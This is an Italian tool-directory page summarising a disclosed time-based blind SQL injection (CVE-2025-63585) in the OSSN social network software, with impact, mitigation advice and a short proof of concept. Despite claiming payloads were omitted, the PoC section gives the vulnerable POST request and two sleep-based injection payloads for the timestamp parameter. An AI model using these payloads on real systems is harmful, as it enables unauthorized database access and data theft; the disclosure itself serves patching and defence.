Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-63585 — Proof-of-concept per una vulnerabilità di SQL injection cieca basata sul tempo nell'endpoint /action/rtcomments/status di OSSN, che dimostra l'esecuzione arbitraria di SQL tramite il parametro timestamp. | Kitploit
Strumenti/GitHubGitHub/kgan0509/cve-2025-63585
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza dei Database
GitHubkgan0509/cve-2025-63585

CVE-2025-63585

Proof-of-concept per una vulnerabilità di SQL injection cieca basata sul tempo nell'endpoint /action/rtcomments/status di OSSN, che dimostra l'esecuzione arbitraria di SQL tramite il parametro timestamp.

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-63585

SQL Injection cieca basata sul tempo in /action/rtcomments/status (parametro: timestamp)

È stata riscontrata una vulnerabilità di SQL injection cieca basata sul tempo nel parametro timestamp dell'endpoint /action/rtcomments/status. Un attaccante autenticato in grado di fornire questo parametro potrebbe eseguire query SQL arbitrarie, esponendo o modificando potenzialmente dati sensibili.

Impatto: divulgazione dei dati, modifica dei dati, escalation dei privilegi, potenziale Denial of Service (DoS) tramite query con ritardo temporale (a seconda dei permessi del database).

Mitigazione: aggiornare OSSN alla versione 8.9 o successiva. Inoltre, assicurarsi che l'applicazione utilizzi query parametrizzate/istruzioni preparate per tutti gli accessi al database, convalidare rigorosamente l'input timestamp (accettare solo formati numerici o ISO previsti), applicare il principio del minimo privilegio per l'account del database e abilitare i timeout delle query e il logging.

Note: i payload di exploit sono stati volutamente omessi per motivi di sicurezza.

github: https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503

PoC

Inviare una richiesta con il metodo POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'

Payload: timestamp=(select*from(select(sleep(10)))a) immagine

Payload: timestamp=(select*from(select(sleep(30)))a) immagine

Scarica lo strumento